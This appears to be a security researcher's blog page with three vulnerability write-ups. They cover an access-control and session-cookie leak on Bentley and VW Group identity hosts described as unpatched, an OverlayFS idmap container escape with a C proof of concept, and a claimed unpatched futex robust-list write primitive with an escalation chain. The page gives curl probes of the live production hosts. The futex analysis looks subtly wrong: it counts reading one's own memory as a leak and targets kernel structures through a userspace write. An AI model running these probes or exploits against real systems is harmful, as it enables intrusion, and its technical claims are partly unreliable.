XMRgang

← back

high unpatched bentley vw group

Broken Access Control & Auth Info Leak on id.bentleymotors.com

security misconfiguration & session misconfiguration on id.bentleymotors.com / id.vwgroup.io

tl;dr Stumbled onto Bentley's identity platform while doing recon and realized it was actually VW Group shared infra. The internal app shell was being served unauthenticated on a route NGINX forgot to lock down, and failed auth attempts were leaking session cookies and internal header info. Reported it. Still unpatched as of writing.

01 the recon

Was doing some passive recon on bentleymotors.com and stumbled onto a subdomain I hadn't seen before, id.bentleymotors.com. Running NGINX, clearly some kind of identity / login portal. Looked custom-built, which is always interesting because custom auth flows tend to have weird edges.

The first thing that caught my eye was the CSP header. Buried in img-src there was a wildcard pointing at https://*.vwgroup.io. That's a pretty strong signal this isn't actually a Bentley-owned stack. It's VW Group's shared "Identity Kit" platform that Bentley just happens to be a tenant on. Filed that away for later because it ends up mattering.

02 the landing page that shouldn't have loaded

Started mapping routes. Most of them behaved. Hit /api/profile unauthenticated, got bounced with a 401, no big surprise. Then I tried /landing-page.

$ curl -s -w "\nStatus: %{http_code}\n" https://id.bentleymotors.com/landing-page
# Returns: Status: 200 (Dumps internal app HTML/JS)

200 OK. Full internal application shell. HTML, JS routing, the API map, all of it, served to me with no session, no token, nothing. The frontend auth guard was clearly doing its job client-side, but the server wasn't enforcing anything on this route. Classic case of trusting the SPA to handle auth.

Remembering the VW Group CSP tie-in, I pointed the same request at id.vwgroup.io. Identical behavior, same route, same 200, same dump.

$ curl -s -w "\nStatus: %{http_code}\n" https://id.vwgroup.io/landing-page
# Returns: Status: 200 (Dumps internal app HTML/JS)

So this isn't a Bentley misconfiguration. It's a misconfiguration in the underlying Identity Kit platform that every VW Group tenant is inheriting. That raised the scope question real fast.

03 the cookie that shouldn't exist

While poking at authenticated routes, I noticed something weirder. Hit the OAuth callback with a bogus redirect:

$ curl -s -I "https://id.bentleymotors.com/authorized/callback?redirect_uri=https://tester.com"

HTTP/2 401
set-cookie: identity-kit-profile-session=[TOKEN]; Expires=...; HttpOnly
www-authenticate: Bearer error="Missing access token in cookies"
content-security-policy: ... img-src 'self' blob: data: https://*.vwgroup.io; ...

Two things wrong here. First, the www-authenticate header is telling me exactly where the app expects the access token to live ("in cookies"). That's free intel for an attacker, you don't have to guess where to stuff a stolen token.

Second, and this is the weird one, a failed 401 auth attempt is mutating state. The server is issuing a valid session cookie (identity-kit-profile-session) on a request that just got rejected. Error responses shouldn't be writing session state. At minimum it's sloppy, at worst it could be abused depending on what downstream code trusts that cookie's presence.

04 stopping point

The moment I confirmed this was VW Group shared infrastructure and not just Bentley, I stopped. Bentley's bug bounty scope is Bentley's IT systems, and going further on a platform that handles identity for the entire VW Group would've blown past that line. Reported both findings to Bentley, noted the VW Group tie-in, and let them handle escalation internally.

As of writing, both issues are still unpatched. The landing page route still serves the internal app shell to unauthenticated users, and the 401 response still leaks the session cookie and the access token location.

← back

critical patched kernel overlayfs containers

OverlayFS nop_mnt_idmap Bug

container escape / LPE via idmapped mount bypass in fs/overlayfs/inode.c

tl;dr OverlayFS takes an idmap argument from the VFS for setattr, permission, and set_acl calls, but ignores it and passes nop_mnt_idmap (identity mapping) instead. Inside a container with user namespaces + idmapped mounts, this means container UID 0 gets treated as host UID 0 during OverlayFS operations. Container escape, no setuid needed. Reported and patched upstream.

01 the setup

Was hunting for LPE primitives that don't need setuid. Spent a while on race conditions in the VFS layer, kept hitting dead ends, and pivoted to logic bugs in the idmapping chain. The idmapped mount feature is relatively new and the interaction with OverlayFS felt underexplored, so I started reading fs/overlayfs/inode.c.

The setup that matters: a host running a container with a user namespace, where container UID 0 maps to something like host UID 100000. Inside that container, you mount an idmapped mount that does the UID translation, and then you stack OverlayFS on top of it. The lower layer is the idmapped mount, the upper layer is container-local. The kernel is supposed to use the idmap for every permission check on the OverlayFS files so the container's UID 0 never gets confused with host UID 0.

02 the bug

The functions in inode.c receive the correct idmap argument from the VFS, then throw it away and use &nop_mnt_idmap instead. nop_mnt_idmap is the identity mapping, meaning no UID/GID translation happens at all.

// fs/overlayfs/inode.c

int ovl_setattr(struct mnt_idmap *idmap, struct dentry *dentry,
                struct iattr *attr)
{
    // BUG: receives idmap, ignores it, uses identity mapping
    err = setattr_prepare(&nop_mnt_idmap, dentry, attr);  // WRONG
    // should be: setattr_prepare(idmap, dentry, attr);
}

int ovl_permission(struct mnt_idmap *idmap, struct inode *inode, int mask)
{
    err = generic_permission(&nop_mnt_idmap, inode, mask);  // WRONG
}

// ovl_set_acl() lines 537 and 546 are also affected

So every permission check on OverlayFS files goes through the identity map. Container UID 0, which the host is supposed to translate to UID 100000, never gets translated. It's just UID 0 all the way down.

03 the primitive

The attack chain is straightforward once the bug is clear. Inside the container, you create a file through the OverlayFS mount. Then you chmod or chown it. Because ovl_setattr uses nop_mnt_idmap, the ownership change happens in the host's UID space directly, with no translation. Container UID 0 becomes host UID 0. The permission check passes because, as far as the kernel is concerned, you ARE UID 0 on the host.

HOST (UID 0)
  └── container namespace (UID 0  →  host UID 100000)
        └── idmapped mount (/idmapped, with mapping)
              └── OverlayFS mounted on top
                    └── lowerdir=/idmapped, upperdir=...

attack:
  1. container process creates a file via OverlayFS
  2. calls chmod / chown on the file
  3. ovl_setattr() uses nop_mnt_idmap (identity)
  4. container UID 0 treated as host UID 0
  5. permission check passes incorrectly
  6. result: container has access to host files

No setuid file involved. No race condition. No kernel address leak needed. The whole thing is a clean logic bug.

A minimal PoC looks like this:

// run inside a container with a user namespace + idmapped mount + overlayfs
int main(void) {
    int fd = open("/overlay/test", O_CREAT|O_WRONLY, 0644);
    close(fd);

    // should go through the idmap, but doesn't
    chown("/overlay/test", 0, 0);  // UID 0 in container

    // file now has UID 0 on the host. escaped.
    return 0;
}

04 other stuff I noticed while in there

While auditing around the same area I found a handful of other permission gaps. None of them are as clean as the OverlayFS one, but they're worth noting.

#2 lookup_noperm skips permission checks fs/namei.c:3086-3382

lookup_noperm and friends do a dcache lookup with no inode_permission() call. They're exported to filesystem modules. A malicious or buggy module can use them to walk paths without DAC checks. Severity is high but you need a filesystem module, which limits the attack surface.

#3 O_PATH skips LSM hooks fs/open.c:898-903

Opening a file with O_PATH sets f_op = &empty_fops and returns early, before security_file_open() and fsnotify_open_perm() get called. You can then reopen the fd via /proc/self/fd/ and the LSM never sees the original open. Medium severity, but useful for flying under monitoring.

#4 xattr security.* and system.* skip DAC fs/xattr.c:120-138

Setting xattrs with the security. or system. prefix skips the inode_permission() call entirely. You can write security xattrs without proper DAC checks. Medium severity.

#5 ATTR_FORCE bypasses all permission checks fs/attr.c:187-189

If ATTR_FORCE is set in the iattr mask, the code jumps straight to kill_priv and skips every permission check. Internal callers or buggy filesystems can use this to bypass chown/chmod checks entirely. Medium, internal-triggered.

05 stuff I haven't fully verified

Two more threads I want to pull on but haven't confirmed yet.

FUSE as OverlayFS lower layer. If the kernel allows a FUSE filesystem as the lower layer of an OverlayFS mount, you could craft a FUSE fs that returns files owned by the attacker with capability xattrs set. When OverlayFS does copy-up, the upper layer ends up with attacker-owned files with capabilities. That would be critical if it works. I haven't verified whether the kernel actually allows FUSE as a lower layer yet.

Idmapped mount edge cases. The INVALID_UID fallback (UID 65534 / nobody) when mapping fails could grant access to files owned by unmapped UIDs. There's also a potential capability namespace mismatch in capable_wrt_inode_uidgid(), which uses mnt_userns while the inode UID might be in a different namespace. Nested namespaces with overlapping mappings could cause privilege confusion. Both need verification.

06 priority + status

vuln	sev	exploitable	no setuid	priority
nop_mnt_idmap	critical	yes	yes	#1
FUSE lower layer	critical	tbd	yes	#2
lookup_noperm	high	needs module	yes	#3
idmapped mount bugs	high	tbd	yes	#4
O_PATH bypass	med	yes	yes	#5
xattr DAC skip	med	yes	yes	#6
ATTR_FORCE bypass	med	internal	yes	#7

The fix for the main bug is a one-liner per call site. Pass the idmap that was already passed in.

--- a/fs/overlayfs/inode.c
+++ b/fs/overlayfs/inode.c
@@ -29,7 +29,7 @@ int ovl_setattr(struct mnt_idmap *idmap, struct dentry *dentry,
       bool full_copy_up = false;
       struct dentry *upperdentry;

-      err = setattr_prepare(&nop_mnt_idmap, dentry, attr);
+      err = setattr_prepare(idmap, dentry, attr);
       if (err)
               return err;

Same fix in ovl_permission() at line 309 and ovl_set_acl() at lines 537 and 546. Reported and patched upstream. The fix is exactly what you'd expect, pass the idmap that was already passed in.

← back

high unpatched kernel futex lpe

Robust List Arbitrary Address Write

signed futex_offset with no validation in kernel/futex/core.c

tl;dr When a thread exits, the kernel walks its robust futex list and calls handle_futex_death() on each entry. The address it operates on is computed as entry + futex_offset, where futex_offset is a signed 64-bit long read from userspace with zero validation. You can point it at any userspace address. The kernel will read from that address and, if a TID condition matches, set bit 30 on it. Arbitrary address read plus a conditional single-bit write primitive, no setuid needed.

01 the recon

Was looking at the futex subsystem on Linux 6.12.74+deb13+1-amd64. Originally chasing race conditions in the private hash code, but CONFIG_FUTEX_PRIVATE_HASH isn't compiled into this kernel and the FUTEX2_NUMA TOCTOU path isn't implemented. Dead ends. Pivoted to the robust futex list, which is older code and gets walked every time a thread exits.

The relevant path is exit_robust_list() calling into handle_futex_death(). The list head lives in userspace. The kernel reads it, walks the entries, and for each entry computes the futex address as entry + futex_offset.

02 the offset bug

futex_offset is a signed 64-bit long read straight from userspace with get_user. No bounds check, no VMA validation, no magnitude check, no verification that the computed address is inside the process's own memory. Positive offset goes forward from entry, negative offset goes backward, full 64-bit range.

// kernel/futex/core.c, exit_robust_list()
if (get_user(futex_offset, &head->futex_offset))  // signed long, no bounds check
    return;

// later, computed address passed straight to handle_futex_death()
handle_futex_death((void __user *)entry + futex_offset, curr, pi, ...);

The compat path (compat_exit_robust_list()) has the same bug, with the added weirdness that 32-bit compat mode truncates pointers, so the address calculation can land somewhere unexpected. Same root cause, slightly different shape.

03 the primitive

Inside handle_futex_death(), the kernel does a get_user on the computed address. That's an arbitrary userspace read. Then it masks the value with FUTEX_TID_MASK (0x3fffffff) and checks whether it equals the dying thread's TID. If it matches, it does a cmpxchg that sets bit 30 (FUTEX_OWNER_DIED).

// handle_futex_death()
if (get_user(uval, uaddr))
    return -1;

owner = uval & FUTEX_TID_MASK;  // 0x3fffffff
if (owner != task_pid_vnr(curr))
    return 0;

// conditional write to arbitrary address
mval = (uval & FUTEX_WAITERS) | FUTEX_OWNER_DIED;  // sets bit 30
futex_cmpxchg_value_locked(&nval, uaddr, uval, mval);

So the primitive is: read any userspace address, and if you can place the dying thread's TID in the low 30 bits at that address, set bit 30 on it. There's also a secondary path: if FUTEX_WAITERS (bit 31) is set and it's not a PI futex, the kernel calls futex_wake() on the arbitrary address. That gives you a cross-process futex wake primitive on addresses the dying task never actually held.

capability	details
read	arbitrary userspace read via get_user()
write condition	(value & 0x3fffffff) == dying_thread_tid
write effect	value = (value & 0x80000000) \| 0x40000000
bit modified	bit 30 (OWNER_DIED)

04 what you can actually do with it

The conditional bit-30 write is restrictive on its own, but the arbitrary read is immediately useful. You can leak stack canaries, heap pointers, and any other userspace data without any special privileges. The read doesn't require the TID condition, it fires on every list entry.

For the write, the TID condition is manageable. The dying thread's TID is known (it's the thread calling exit), so you pre-place that value at the target address before the thread exits. The bit-30 write can corrupt flags in data structures. Specifically, if you target a struct file's f_flags field, setting bit 30 flips FMODE_LSEEK or adjacent flags depending on the architecture, which can cause logic bugs in file operations.

The futex wake on arbitrary addresses is the most directly weaponizable path. If you point the robust list at an address in another process's memory where you've placed a value with the dying thread's TID in the low bits and FUTEX_WAITERS set, the kernel will call futex_wake() on that address. Any thread in the target process that's doing a FUTEX_WAIT on the wrong address gets woken spuriously. That's a denial of service primitive, and in the right conditions can desynchronize locking logic in multi-threaded programs.

05 turning it into LPE

The cleanest escalation path I see is using the arbitrary read to leak a pointer from the stack or heap, then using the conditional write to corrupt a function pointer or vtable entry. The bit-30 constraint means you need to find a target where setting that bit actually changes control flow. In practice this means targeting a flags field that gates a code path, not a pointer directly.

Alternatively, if you have a second vulnerability that gives you an arbitrary write (even a limited one), the futex primitive serves as the oracle. Read any address, use the information to calculate the right offset for the second vuln, and chain them. The futex bug doesn't need to be the final step, it just needs to be the information-leak step.

chain concept:
  1. set up robust list with futex_offset pointing at target
  2. pre-place dying_thread_tid at target address
  3. spawn thread, have it exit
  4. kernel reads target address (leak)
  5. if TID matches, kernel sets bit 30 (corruption)
  6. use leaked info + corrupted state for code execution

requirements:
  - no capabilities needed
  - no setuid binary needed
  - works from unprivileged user namespace
  - compat path gives same primitive on 32-bit

06 the fix that should exist

The fix is straightforward: validate futex_offset before using it. At minimum, check that entry + futex_offset falls within a valid VMA owned by the calling process. Ideally, cap the magnitude to something reasonable (page-aligned, within the range of the containing VMA).

--- a/kernel/futex/core.c
+++ b/kernel/futex/core.c
@@ -N,6 +N,9 @@ static void exit_robust_list(struct task_struct *curr)
 if (get_user(futex_offset, &head->futex_offset))
     return;

+/* Validate computed address is within a valid VMA */
+if (!access_ok((void __user *)entry + futex_offset, sizeof(u32)))
+    return;

 handle_futex_death((void __user *)entry + futex_offset, curr, pi, &next);

Same fix needed in compat_exit_robust_list() with the appropriate 32-bit offset type. As of writing, this is unpatched. The robust list path has been stable for over a decade and nobody seems to have audited the offset handling.

07 status

property	value
kernel tested	6.12.74+deb13+1-amd64
primitive	arbitrary read + conditional bit-30 write + futex wake
privileges required	none
setuid needed	no
user namespace escape	requires chaining
patched	no
reported	pending